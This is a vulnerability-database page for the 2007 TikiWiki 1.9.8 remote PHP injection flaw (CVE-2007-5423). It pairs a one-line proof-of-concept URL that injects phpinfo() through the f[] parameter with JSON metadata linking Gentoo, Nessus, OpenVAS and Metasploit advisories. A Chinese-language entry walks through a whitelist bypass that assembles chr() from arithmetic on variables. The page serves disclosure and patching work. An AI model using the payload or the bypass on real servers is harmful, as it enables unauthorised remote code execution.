Search...

TikiWiki 1.9.8 - Remote PHP Injection Vulnerability

2007-10-10T00:00:00

ID EDB-ID:4509
Type exploitdb
Reporter ShAnKaR
Modified 2007-10-10T00:00:00

Description

TikiWiki 1.9.8 Remote PHP Injection Vulnerability. CVE-2007-5423. Webapps exploit for php platform

                                        
                                            TikiWiki 1.9.8 Remote PHP Injection Vulnerability

Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

# milw0rm.com [2007-10-10]

JSON Vulners Source

Initial Source

{"hash": "54ae8bae3ed15980c26115aeb4636366fd08c44a14a59f8f054c7129fcee9b35", "id": "EDB-ID:4509", "lastseen": "2016-01-31T21:05:47", "viewCount": 10, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4509/", "description": "TikiWiki 1.9.8 Remote PHP Injection Vulnerability. CVE-2007-5423. Webapps exploit for php platform", "title": "TikiWiki 1.9.8 - Remote PHP Injection Vulnerability", "sourceData": "TikiWiki 1.9.8 Remote PHP Injection Vulnerability\n\nExample: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=\n\n# milw0rm.com [2007-10-10]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-5423"], "published": "2007-10-10T00:00:00", "osvdbidlist": ["40478"], "references": [], "reporter": "ShAnKaR", "modified": "2007-10-10T00:00:00", "href": "https://www.exploit-db.com/exploits/4509/"}

{"result": {"cve": [{"id": "CVE-2007-5423", "type": "cve", "title": "CVE-2007-5423", "description": "tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.", "published": "2007-10-12T19:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5423", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-10-19T11:12:58"}], "canvas": [{"id": "TIKIWIKI_EXEC", "type": "canvas", "title": "Immunity Canvas: TIKIWIKI_EXEC", "description": "**Name**| tikiwiki_exec \n---|--- \n**CVE**| CVE-2007-5423 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| TikiWiki function create exploit \n**Notes**| CVSS: 7.5 \nRepeatability: Infinite \nVENDOR: Tikiwiki \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423 \nCVE Name: CVE-2007-5423 \n\n", "published": "2007-10-12T19:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/tikiwiki_exec", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-09-25T14:13:45"}], "packetstorm": [{"id": "PACKETSTORM:82370", "type": "packetstorm", "title": "TikiWiki tiki-graph_formula Remote Command Execution", "description": "", "published": "2009-10-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82370/TikiWiki-tiki-graph_formula-Remote-Command-Execution.html", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-12-05T22:15:01"}], "seebug": [{"id": "SSV:2363", "type": "seebug", "title": "TikiWiki Tiki-Graph_Formula.PHP\u767d\u540d\u5355\u68c0\u67e5\u4ee3\u7801\u6ce8\u5165\u6f0f\u6d1e", "description": "TikiWiki\u662f\u4e00\u6b3e\u57fa\u4e8ePHP\u3001ADOdb\u4ee5\u53casmarty\u5f00\u53d1\u7684\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf/\u95e8\u6237\u7cfb\u7edf/\u7fa4\u4ef6\u7cfb\u7edf\u3002\r\nTikiWiki\u5305\u542b\u7684tiki-graph_formula.php\u4e0d\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u6076\u610fPHP\u4ee3\u7801\u5e76\u4ee5WEB\u6743\u9650\u6267\u884c\u3002\r\nTikiWiki\u7684tiki-graph_formula.php\u811a\u672c\u4f7f\u7528PHP\u7684create_function()\u521b\u5efa\u533f\u540d\u51fd\u6570\u6765\u52a8\u6001\u8ba1\u7b97\u7531\u7528\u6237\u901a\u8fc7'f' URL\u53c2\u6570\u63d0\u4f9b\u7684\u6570\u5b66\u51fd\u6570\u3002\r\n\u4e3a\u4e86\u4fdd\u62a4\u9488\u5bf9\u4efb\u610fPHP\u4ee3\u7801\u7684\u6267\u884c\uff0cTikiWiki\u5f00\u53d1\u8005\u7ec4\u5408\u9ed1\u540d\u5355\u548c\u767d\u540d\u5355\u3002\u4e00\u65b9\u9762\u4ed6\u4eec\u5bf9\u4e09\u4e2a\u5b57\u7b26\u8fdb\u884c\u9ed1\u540d\u5355\u8fc7\u6ee4\uff0c\u53e6\u4e00\u65b9\u9762\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\u4e2d\u53ea\u5141\u8bb8\u90e8\u5206\u6570\u5b57\u5b57\u7b26\u4e32\u3002\r\n\u4e09\u4e2a\u9ed1\u540d\u5355\u5217\u8868\u5b57\u7b26\u4e3a\uff1a\r\n` - \u5141\u8bb8SHELL\u547d\u4ee4\u6267\u884cAllows execution of shell commands\r\n' - \u5b57\u7b26\u4e32\u5206\u9694\u7b26\r\n" - \u5b57\u7b26\u4e32\u5206\u9694\u7b26\r\n\u5141\u8bb8\u7684\u6570\u5b57\u5b57\u7b26\u4e32\u767d\u540d\u5355\u53ea\u5141\u8bb8\u5728\u90e8\u5206\u6570\u5b66\u51fd\u6570\u4e2d\u4f7f\u7528\u5982\uff1asin, cos, tan, pow, ...\r\n\u5f53ShAnKaR\u5ba1\u6838TikiWiki\u65f6\u767d\u540d\u5355\u5217\u8868\u68c0\u67e5\u4e0d\u6b63\u786e\u5b9e\u73b0\uff0c\u53ef\u5bfc\u81f4\u6267\u884cPHP\u51fd\u6570\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u5df2\u7ecf\u5728CVE-2007-5423\u516c\u5e03\u5e76\u5728TikiWiki 1.9.8.1 update\u4e2d\u5f97\u5230\u4fee\u8865\u3002\r\n\u4f46\u662f\u7531\u4e8ePHP\u652f\u6301\u53d8\u91cf\u51fd\u6570\u548c\u53ef\u53d8\u53d8\u91cf\uff0c\u4fee\u8865\u7684\u767d\u540d\u5355\u5217\u8868\u6ca1\u6709\u4fdd\u62a4\u4efb\u610fPHP\u4ee3\u7801\u6267\u884c\uff1a\r\n$varname = 'othervar';\r\n$$varname = 4; // set $othervar to 4\r\n$funcname = 'chr';\r\n$funcname(95); // call chr(95)\r\n\u56e0\u4e3aTikiWiki\u7684\u9ed1\u540d\u5355\u4e0d\u4fdd\u62a4'$'\u5b57\u7b26\uff0c\u6ce8\u5165PHP\u8868\u8fbe\u5f0f\u53ef\u4f7f\u7528\u4e34\u65f6\u53d8\u91cf\u5982$sin, $cos, $tan, ...\r\n\u56e0\u6b64\u5f88\u663e\u7136\u901a\u8fc7\u586b\u5145\u5b57\u7b26\u4e32\u4ee3\u8868\u547d\u540d\u7684\u5176\u4ed6\u51fd\u6570\u7684\u4e34\u65f6\u53d8\u91cf\u53ef\u7ed5\u8fc7\u4fdd\u62a4\u3002\r\n\u867d\u7136\u7531\u4e8e\u6240\u6709\u5141\u8bb8\u7684\u51fd\u6570\u53ea\u8fd4\u56de\u6570\u5b57\uff0c\u770b\u8d77\u6765\u4ece\u4e34\u65f6\u53d8\u91cf\u4e2d\u83b7\u5f97\u5b57\u7b26\u4e32\u6bd4\u8f83\u56f0\u96be\uff0c\u4f46\u662f\u8fd8\u6709\u4e24\u4e2aPHP\u529f\u80fd\u53ef\u5e2e\u52a9\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff1a\u6570\u7ec4\u5230\u5b57\u7b26\u4e32\u8f6c\u6362\u53ca\u5904\u7406\u672a\u660e\u5e38\u6570\uff1a\r\n$sin=cosh; // cosh is an unknown constant. \r\n// PHP assumes the string 'cosh' as value\r\n$sin[]=pi(); // Creates an array\r\n$sin=$sin.$sin; // Stringconcats of arrays. Array to string \r\n// conversion. Becomes 'ArrayArray'\r\n\u4f7f\u7528\u8fd9\u4e9b\u65b9\u6cd5\u7ec4\u5408\u4f7f\u7528++\u64cd\u4f5c\u7b26\u4e5f\u5141\u8bb8\u589e\u52a0\u6570\u5b57\u5b57\u7b26\u4e32\uff0c\u53ef\u80fd\u5982\u4e0b\u8c03\u7528chr()\u51fd\u6570\uff1a\r\n$tan=pi()-pi(); // Get 0 into $tan\r\n$sin=cosh; // Get the string 'cosh' into $sin\r\n$min=$sin[$tan]; // Get 'c' into $min\r\n$tan++; // Get 1 into $tan\r\n$min.=$sin[$tan+$tan+$tan] // Append 'h' to 'c'\r\n$min.=$sin[$tan]; // Append 'o' to 'ch'\r\n$min++; // Increment 'cho' to 'chp'\r\n$min++; // Increment 'chp' to 'chq'\r\n$min++; // Increment 'chq' to 'chr'\r\n$min($tan) // Call chr(1)\r\n\u901a\u8fc7\u8bbf\u95eechr()\u51fd\u6570\u53ef\u80fd\u5efa\u7acb\u4efb\u610f\u5b57\u7b26\u4e32\u5e76\u8c03\u7528\u4efb\u4f55\u5176\u4ed6\u51fd\u6570\uff0c\u5bfc\u81f4\u4efb\u610fPHP\u4ee3\u7801\u6267\u884c\u3002\r\n\n\nTikiWiki Project TikiWiki 1.9.8 1\r\nTikiWiki Project TikiWiki 1.9.8 \r\nTikiWiki Project TikiWiki 1.9.7 \r\nTikiWiki Project TikiWiki 1.9.6 \r\nTikiWiki Project TikiWiki 1.9.5 \r\nTikiWiki Project TikiWiki 1.9.4 \r\nTikiWiki Project TikiWiki 1.9.3 2\r\nTikiWiki Project TikiWiki 1.9.3 1\r\nTikiWiki Project TikiWiki 1.9.2 \r\nTikiWiki Project TikiWiki 1.9.1 .1\r\nTikiWiki Project TikiWiki 1.9.1 \r\nTikiWiki Project TikiWiki 1.9 -rc3.1\r\nTikiWiki Project TikiWiki 1.9 -rc3\r\nTikiWiki Project TikiWiki 1.9 -rc2\r\nTikiWiki Project TikiWiki 1.9 -rc1\r\n\n \u5347\u7ea7\u7a0b\u5e8f\uff1a\r\nTikiWiki Project TikiWiki 1.9 -rc2\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9 -rc1\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9 -rc3\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9 -rc3.1\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.1 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.1 .1\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.2 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.3 2\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.3 1\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.4 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.5 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.6 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.7 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.8 1\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1\r\nTikiWiki Project TikiWiki 1.9.8 \r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\n<a href=\"http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt\" target=\"_blank\">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1", "published": "2007-10-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-2363", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-11-19T21:55:54"}], "nessus": [{"id": "GENTOO_GLSA-200710-21.NASL", "type": "nessus", "title": "GLSA-200710-21 : TikiWiki: Arbitrary command execution", "description": "The remote host is affected by the vulnerability described in GLSA-200710-21 (TikiWiki: Arbitrary command execution)\n\n ShAnKaR reported that input passed to the 'f' array parameter in tiki-graph_formula.php is not properly verified before being used to execute PHP functions.\n Impact :\n\n An attacker could execute arbitrary code with the rights of the user running the web server by passing a specially crafted parameter string to the tiki-graph_formula.php file.\n Workaround :\n\n There is no known workaround at this time.", "published": "2007-10-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=27553", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-10-29T13:39:18"}, {"id": "TIKIWIKI_F_CMD_EXEC.NASL", "type": "nessus", "title": "TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution", "description": "The remote host is running TikiWiki, an open source wiki application written in PHP.\n\nThe version of TikiWiki on the remote host fails to sanitize input to the 'f[]' parameter of the 'tiki-graph_formula.php' script before using it as a function call. Regardless of PHP's 'register_globals' setting, an unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id.", "published": "2007-10-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=26968", "cvelist": ["CVE-2007-5423"], "lastseen": "2018-05-17T12:44:40"}, {"id": "GENTOO_GLSA-200711-19.NASL", "type": "nessus", "title": "GLSA-200711-19 : TikiWiki: Multiple vulnerabilities", "description": "The remote host is affected by the vulnerability described in GLSA-200711-19 (TikiWiki: Multiple vulnerabilities)\n\n Stefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion.\n Impact :\n\n A remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "published": "2007-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=28219", "cvelist": ["CVE-2007-5682", "CVE-2007-5423"], "lastseen": "2018-01-13T01:02:29"}], "gentoo": [{"id": "GLSA-200710-21", "type": "gentoo", "title": "TikiWiki: Arbitrary command execution", "description": "### Background\n\nTikiWiki is an open source content management system written in PHP. \n\n### Description\n\nShAnKaR reported that input passed to the \"f\" array parameter in tiki-graph_formula.php is not properly verified before being used to execute PHP functions. \n\n### Impact\n\nAn attacker could execute arbitrary code with the rights of the user running the web server by passing a specially crafted parameter string to the tiki-graph_formula.php file. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll TikiWiki users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/tikiwiki-1.9.8.1\"", "published": "2007-10-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200710-21", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-09-06T19:46:09"}, {"id": "GLSA-200711-19", "type": "gentoo", "title": "TikiWiki: Multiple vulnerabilities", "description": "### Background\n\nTikiWiki is an open source content management system written in PHP. \n\n### Description\n\nStefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion. \n\n### Impact\n\nA remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll TikiWiki users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/tikiwiki-1.9.8.3\"", "published": "2007-11-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200711-19", "cvelist": ["CVE-2007-5682", "CVE-2007-5423"], "lastseen": "2016-09-06T19:46:04"}], "exploitdb": [{"id": "EDB-ID:16911", "type": "exploitdb", "title": "TikiWiki tiki-graph_formula Remote PHP Code Execution", "description": "TikiWiki tiki-graph_formula Remote PHP Code Execution. CVE-2007-5423. Webapps exploit for php platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16911/", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-02-02T06:48:07"}], "openvas": [{"id": "OPENVAS:58700", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200710-21 (tikiwiki)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200710-21.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=58700", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-07-24T12:49:56"}, {"id": "OPENVAS:59239", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200711-19 (tikiwiki)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200711-19.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=59239", "cvelist": ["CVE-2007-5682", "CVE-2007-5423"], "lastseen": "2017-07-24T12:50:02"}], "metasploit": [{"id": "MSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_GRAPH_FORMULA_EXEC", "type": "metasploit", "title": "TikiWiki tiki-graph_formula Remote PHP Code Execution", "description": "TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.", "published": "2009-07-21T15:20:35", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2007-5423"], "lastseen": "2018-03-21T10:03:21"}]}}